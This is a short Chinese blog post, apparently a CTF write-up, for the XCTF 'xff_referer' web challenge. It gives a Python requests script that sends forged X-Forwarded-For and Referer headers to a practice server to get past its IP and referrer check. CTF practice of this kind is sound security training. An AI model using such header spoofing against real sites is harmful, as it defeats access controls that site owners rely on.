攻防世界：web习题之xff_referer

攻防世界：web习题之xff_referer

题目内容

https://adworld.xctf.org.cn/challenges/list

这道题的网页会首先会显示：

当成功修改ip地址之后会提示：

思路

我们可以用python的requests包来添加伪造的 X-Forwarded-For 和 Referer 请求头。

代码

import requests

url = "http://61.147.171.105:51058"

# 添加伪造的 X-Forwarded-For 和 Referer 请求头
headers = {
    "X-Forwarded-For": "123.123.123.123",
    "Referer": "https://www.google.com"
}

# 发送 GET 请求
response = requests.get(url, headers=headers)

# 打印响应内容
print(response.text)

__EOF__

本文作者：笔墨绘星河
本文链接：https://www.cnblogs.com/bimohuixinghe/p/18584582.html
关于博主：评论和私信会在第一时间回复。或者直接私信我。
版权声明：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！
声援博主：如果您觉得文章对您有帮助，可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力！

posted @ 2024-12-03 17:23 笔墨绘星河_Archer 阅读(28) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

【推荐】还在用 ECharts 开发大屏？试试这款永久免费的开源 BI 工具！
【推荐】国内首个AI IDE，深度理解中文开发场景，立即下载体验Trae
【推荐】编程新体验，更懂你的AI，立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包，你的智能百科全书，全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell：AI 加持，快人一步

相关博文：

· 攻防世界：Web习题之 get_post

· 攻防世界：web习题之disabled_button

· [CTF/网络安全] 攻防世界 xff_referer 解题详析

· 攻防世界-web-新手区-xff_referer

· Web_XCTF_WriteUp | xff_referer

阅读排行：
· 单线程的Redis速度为什么快？
· 展开说说关于C#中ORM框架的用法！
· Pantheons：用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么退出登录或修改密码无法使 token 失效

公告

攻防世界：web习题之xff_referer

发表于 2024-12-03 17:23阅读：28评论：0推荐：0

CTF / Web CTF python web 网络安全

0

0

关注

跳至底部

昵称：笔墨绘星河_Archer
园龄： 9个月
粉丝： 1
关注： 2